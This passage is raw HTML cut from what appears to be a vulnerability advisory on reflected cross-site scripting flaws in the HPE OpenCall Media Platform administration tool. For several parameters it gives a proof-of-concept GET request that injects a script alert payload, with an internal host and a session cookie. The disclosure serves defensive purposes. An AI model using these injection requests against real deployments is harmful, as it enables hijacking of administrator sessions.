class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root&amp;DATE=0&amp;LEV_NUM=00b96d&#8221;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;58400&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83670502195025-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83670502195025-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83670502195025-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83670502195025-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83670502195025-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83670502195025-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83670502195025-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83670502195025-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83670502195025-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83670502195025-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83670502195025-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">00b96d<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">58400<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83670502195025-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83670502195025-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83670502195025-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83670502195025-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83670502195025-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83670502195025-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83670502195025-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83670502195025-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83670502195025-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0043 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>NAME<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter NAME input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL:<br \/> <em>\/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;<strong>NAME<\/strong>=Root8c0d0&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;b811a&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83678957641221\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/BMPFFaultMgr.chailet?GetMapAction=HTML&amp;LEVEL=TOP_LEVEL&amp;TYPE=1&amp;NAME=Root8c0d0&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;b811a&amp;DATE=0&amp;LEV_NUM=0&amp;LEV_NAME0=N0&amp;LEV_NAME1=N1&amp;LEV_NAME2=N2&amp;LEV_NAME3=N3&amp;LEV_TYPE0=T0&amp;LEV_TYPE1=T1&amp;LEV_TYPE2=T2&amp;LEV_TYPE3=T3 HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83678957641221-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83678957641221-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83678957641221-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83678957641221-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83678957641221-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83678957641221-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83678957641221-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83678957641221-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83678957641221-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83678957641221-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83678957641221-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BMPFFaultMgr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">chailet<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">GetMapAction<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEVEL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TOP_LEVEL<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">Root8c0d0<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">b811a<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">DATE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NUM<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_NAME3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE0<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE1<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE2<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">T2<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">LEV_TYPE3<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">T3 <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83678957641221-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83678957641221-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83678957641221-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83678957641221-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83678957641221-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83678957641221-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83678957641221-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/BMPFFaultMgr.chailet<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83678957641221-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83678957641221-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0028 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>next<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch function parameter <em>next<\/em> input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>GET \/OCMPOAM\/cdrdispatch?sessionType=ACTIVE&amp;cmd=ViewActiveCalls&amp;<strong>next<\/strong>=DisplayBaseCdrBrowsePagea908f&lt;script&gt;alert(1)&lt; %2fscript&gt;2f6bfa40b3d&amp;CallSessionList=ACTIVE<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da8367d423635730\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/cdrdispatch?sessionType=ACTIVE&amp;cmd=ViewActiveCalls&amp;next=DisplayBaseCdrBrowsePagea908f&lt;script&gt;alert(1)&lt;%2fscript&gt;2f6bfa40b3d&amp;CallSessionList=ACTIVE HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&amp;sessionType=NONE  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8367d423635730-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8367d423635730-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8367d423635730-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8367d423635730-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8367d423635730-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8367d423635730-6\">6<\/div>\n<div class=\"crayon-num\" 